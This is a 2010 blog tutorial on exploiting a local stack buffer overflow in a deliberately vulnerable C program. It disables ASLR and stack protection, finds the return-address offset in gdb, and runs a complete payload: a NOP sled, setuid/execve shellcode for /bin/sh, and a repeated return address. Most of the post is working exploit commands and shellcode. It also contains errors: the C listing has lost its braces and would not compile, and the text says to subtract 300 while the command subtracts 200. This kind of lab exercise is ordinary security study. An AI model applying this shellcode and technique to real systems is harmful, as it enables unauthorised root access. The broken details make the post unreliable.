Tuesday, September 7, 2010

More buffer overflows on the easy.

In my last BOF post i showed a slick way to do a local buffer overflow and how to do it with a really small buffer. This time we will work with a nice big buffer like 400 chars long. Like before lets get our environment ready, we can start by turning off address space randomization:

echo 0 > /proc/sys/kernel/randomize_va_space

Last time we saw how to use core dumps, lets enable them again. Now we need a app:

#include < stdio.h >
#include < string.h >

int main (int argc, char** argv)
char buffer [400];
strcpy(buffer, argv [1]);
printf("sent to buffer: %s \n", buffer);
return 0;

And we compile it like so:

gcc -z execstack -g -o BOF2 -fno-stack-protector -mpreferred-stack-boundary=2 BOF2.c

Yes this is the same app as before but with a much bigger buffer now lets run a few tests and see just how much room we have to work with.

./BOF2 `perl -e 'print "A" x 402'`

Ok everything is normal lets try:

./BOF2 `perl -e 'print "A" x 404'`

Oh we get a seg fualt and a core dump, when we load that up in gdb and look at the registars we see we overwrote all of ebp with 41's So we know from last time eip is only 4 spaces chars away making our total buffer size 408, but lets test that out:

./BOF2 `perl -e 'print "A" x 408'`

Again we seg fualt and when we open the core dump in gdb and inspect the registars we see we can control eip. :D Ok so now we need to get the address of esp so we can get our attack vector. We do this like so:

gdb -q BOF2

then we need insert a line break at our point of BoF, in our app its line 7. So enter this command:

b 7

Then run a little test so we can get esps address:

run test

Now when the app hits out line break it should stop running and give us a chance to look at a few things like register addresses. We do that with the "i r" command. We should have something like this:

Breakpoint 1, main (argc=2, argv=0xbffffd24) at BOF2.c:7
7 strcpy(buffer, argv [1]);
(gdb) i r
eax 0xbffffd24 -1073742556
ecx 0xbe3b369c -1103415652
edx 0x2 2
ebx 0xb7fd8ff4 -1208119308
esp 0xbffffb00 0xbffffb00
ebp 0xbffffc98 0xbffffc98
esi 0xb7ffece0 -1207964448
edi 0x0 0
eip 0x804839d 0x804839d
eflags 0x286 [ PF SF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

And there you have it, esp is at 0xbffffb00, now lets subtract 300 from that to get our target address "attack address". We do that with this command:

printf "%x\n" $((0xbffffb00-200))

Which should give us "bffffa38"
Now we need some shell code, but lucky us we can just use the same stuff we used last time. Its time for some math

Our buffer it 408 chars long.
-We will want to use at lest 200 chars for a NOP sled.
-Our shell code (28)
Ok we are left with 180 chars to fill up, so to make sure we get the right address in eip we will just fill it up with our attack address (bffffa38) Now eip is 4 chars long so lets take 180/4 which gives us 45. So we need to repeat bffffa38 45 times in little endian format and hex it.

So our end result shoule look something like this:

`perl -e 'print "\x90" x 200'``printf "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"``perl -e 'print "\x38\xfa\xff\xbf" x 45'`

This part is the NOP sled:
`perl -e 'print "\x90" x 200'`

Here is our shell code:
`printf "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"`

And here is our attack address being repeated:
`perl -e 'print "\x38\xfa\xff\xbf" x 45'`

Ok lets run this shit:

./BOF2 `perl -e 'print "\x90" x 200'``printf "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"``perl -e 'print "\x38\xfa\xff\xbf" x 45'`

If your 1337 you should now be at a new shell!! Ok later bitches.

No comments:

Post a Comment